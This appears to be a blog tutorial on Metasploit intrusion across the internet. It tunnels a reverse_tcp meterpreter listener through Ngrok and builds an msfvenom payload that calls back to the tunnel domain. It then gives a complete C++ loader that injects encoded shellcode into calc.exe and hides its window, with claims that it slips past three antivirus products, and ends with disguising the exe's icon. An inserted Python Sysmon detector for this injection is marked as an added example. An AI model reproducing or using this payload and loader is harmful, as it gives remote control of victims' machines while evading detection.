MSF External-Network Penetration + Shellcode AV Evasion

1. NAT traversal

The Sunny-Ngrok service is used. After registering on the Sunny-Ngrok site you receive a free or paid tunnel; add a TCP tunnel and pick a port number of your choosing.
Official site: https://www.ngrok.cc/ (Sunny-Ngrok)
Install the Sunny-Ngrok client under Kali and start Sunny-Ngrok from that directory.


2. External-network penetration

Generate the external-network payload. Note that lhost and lport here are the domain name and remote port assigned by the tunnel:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxxxx.xxxx.com lport=10011 -f exe > test.exe

NAT mode is used here to isolate the virtual machine's internal network from the external network.
Set up the listener.

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.157
msf5 exploit(multi/handler) > set lport 12581
msf5 exploit(multi/handler) > run

Wait for the victim host to connect back.
External-network penetration succeeded.


3. Shellcode AV evasion

The main evasion approaches are "separation", "obfuscation", "injection" and loader-based execution.
Reference: https://xz.aliyun.com/t/7170#toc-4 (shellcode AV-evasion summary)
The injection approach is used here.
Use msfvenom to generate the C-format shellcode for the external-network payload:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=xxxx.xxxx.com lport=10011 -f c

Then use a C program to start a normal process and inject the shellcode into it:

// 1018.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <tchar.h>
#include <iostream>
using namespace std;

// Paste the C-format shellcode produced by the msfvenom command above here.
unsigned char shellcode[] =
    /* (shellcode goes here) */ ;

BOOL injection()
{
    TCHAR Cappname[MAX_PATH] = { 0 };
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID lpMalwareBaseAddr;
    LPVOID lpnewVictimBaseAddr;
    HANDLE hThread;
    DWORD dwExitCode;
    BOOL bRet = FALSE;

    lpMalwareBaseAddr = shellcode;

    // Build the path of the host process: <system directory>\calc.exe
    GetSystemDirectory(Cappname, MAX_PATH);
    _tcscat(Cappname, _T("\\calc.exe"));   // _T() keeps the literal TCHAR-compatible
    _tprintf(_T("Injection program Name:%s\r\n"), Cappname);

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    // Start the host process in the suspended state
    if (CreateProcess(Cappname, NULL, NULL, NULL,
        FALSE, CREATE_SUSPENDED
        , NULL, NULL, &si, &pi) == 0)
    {
        return bRet;
    }

    // Allocate executable memory in the new process for the shellcode
    lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
        , NULL, sizeof(shellcode) + 1, MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (lpnewVictimBaseAddr == NULL)
    {
        return bRet;
    }

    // Copy the shellcode into the allocated region
    WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr,
        (LPVOID)lpMalwareBaseAddr, sizeof(shellcode) + 1, NULL);

    // Run it on a new thread inside the host process
    hThread = CreateRemoteThread(pi.hProcess, 0, 0,
        (LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);

    // Block until the host process goes away, then clean up
    WaitForSingleObject(pi.hThread, INFINITE);
    GetExitCodeProcess(pi.hProcess, &dwExitCode);
    TerminateProcess(pi.hProcess, 0);
    return bRet;
}

void help(char* proc)
{
    printf("%s:[-] \nstart a process and inject shellcode into its memory\r\n", proc);
}

int main(int argc, char* argv[])
{
    HWND hwndDOS = GetForegroundWindow(); // get the handle of the foreground (console) window
    ShowWindow(hwndDOS, SW_HIDE);         // hide that window
    help(argv[0]);
    injection();
    return 0;
}

Compile and build the exe, then check the result against 360: evaded.
QQ Security Manager: evaded.
Huorong: evaded.
However, it cannot bypass the Windows 10 Microsoft firewall.
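From the defender's side, the chain this section describes (a user-launched binary spawns calc.exe and immediately starts a remote thread in it at an address that no loaded module backs) is visible in Sysmon Event ID 1 (process create) and Event ID 8 (CreateRemoteThread) telemetry. The detector below is an added example, not code from the original post; the events are constructed, and the reading of an empty StartModule as "unbacked memory" is an assumption of the example.

```python
from typing import Dict, List, Tuple

# Constructed Sysmon-style events (not real telemetry). Event ID 1 is process
# creation, Event ID 8 is CreateRemoteThread; the field names follow Sysmon's
# schema, the values are made up for this example.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "ProcessGuid": "{A}", "ParentProcessGuid": "{EXPLORER}",
     "Image": "C:\\Users\\bob\\Downloads\\test.exe"},
    # test.exe spawns calc.exe (the injector above does this with CREATE_SUSPENDED)
    {"EventID": 1, "ProcessGuid": "{B}", "ParentProcessGuid": "{A}",
     "Image": "C:\\Windows\\System32\\calc.exe"},
    # ... then starts a thread in it whose start address is not inside any module
    {"EventID": 8, "SourceProcessGuid": "{A}", "TargetProcessGuid": "{B}",
     "StartAddress": "0x00000000001E0000", "StartModule": "", "StartFunction": ""},
    # Benign control: a remote-started thread that begins inside ntdll.dll
    {"EventID": 1, "ProcessGuid": "{C}", "ParentProcessGuid": "{SERVICES}",
     "Image": "C:\\Windows\\System32\\svchost.exe"},
    {"EventID": 8, "SourceProcessGuid": "{SERVICES}", "TargetProcessGuid": "{C}",
     "StartAddress": "0x00007FF8A1B20000",
     "StartModule": "C:\\Windows\\System32\\ntdll.dll",
     "StartFunction": "RtlUserThreadStart"},
]


def detect_remote_thread_injection(events: List[Dict]) -> List[Tuple[str, str, str]]:
    """Return (source image, target image, start address) for every remote thread
    that a process starts in a child it created itself, at an address outside any
    loaded module. Assumption: an empty StartModule means unbacked memory."""
    procs = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    hits = []
    for e in events:
        if e["EventID"] != 8:
            continue
        target = procs.get(e["TargetProcessGuid"])
        if target is None:
            continue
        spawned_by_source = target["ParentProcessGuid"] == e["SourceProcessGuid"]
        unbacked_start = not e.get("StartModule")
        if spawned_by_source and unbacked_start:
            source = procs.get(e["SourceProcessGuid"])
            src_image = source["Image"] if source else e["SourceProcessGuid"]
            hits.append((src_image, target["Image"], e["StartAddress"]))
    return hits


if __name__ == "__main__":
    for src, dst, addr in detect_remote_thread_injection(SAMPLE_EVENTS):
        print(f"suspicious remote thread: {src} -> {dst} @ {addr}")
```

The benign svchost.exe pair is not reported because its thread starts inside ntdll.dll; only the parent-spawned, module-less start address is flagged.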


4. Changing the icon

Online .png to .ico converter: https://www.img2go.com/zh/convert/png-to-ico
Use Resource Hacker to change the exe's icon; official download: http://www.angusj.com/resourcehacker/


References:
https://www.fujieace.com/kali-linux/msf-extranet-intranet.html (MSF external-network penetration)
https://xz.aliyun.com/t/7170#toc-4 (shellcode AV-evasion summary)
